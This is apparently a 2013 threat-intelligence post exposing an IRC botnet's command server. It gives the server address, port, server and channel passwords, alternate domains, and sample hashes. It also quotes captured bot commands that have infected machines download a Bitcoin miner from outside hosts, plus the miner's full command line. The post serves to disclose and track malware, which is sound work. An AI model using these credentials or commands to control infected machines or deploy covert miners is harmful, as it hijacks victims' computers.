y.osej36.com (Irc botnet hosted by gandi.net)

By I_Post_Ur_Info, June 23, 2013

Resolved y.osej36.com to 92.243.8.222

Server: y.osej36.com
Port: 80
Server password: passwd
Channel: #root
Channel password: redem
!NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e !NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e !s -n

A modified ircd is used, so you may have trouble connecting.

Alternate domains:
y.v23sdy.com
y.rwt234.com

Bitcoin mining info: minerd.exe -a scrypt -s 20 –no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -x

Related md5s (search on malwr.com to download the samples):
Irc botnet: 4eff5faecb1576e724031c4579f30296
Bitcoin miner: a392564eae140562e4b27d0ab078ba1e

Hosting infos: http://whois.domaintools.com/92.243.8.222

Categories: Uncategorized

Tags: Bitcoin Miner Botnetirc bot

Previous postthinkgreensupply.com(Pony hosted in United States Portland Directspace Networks Llc.)

Next postbelakey.com(Pony hosted in Germany Gunzenhausen Osauhing Future Technologies)

gigasbh.org(IRC Botnet Hosted In France Paris 1&1 Internet Ag)

89.248.172.240(30k botnet hosted in Netherlands Amsterdam Ecatel Ltd)

gki2mpdt3rsokbmv.onion (Irc botnet hosted on a Tor hidden service)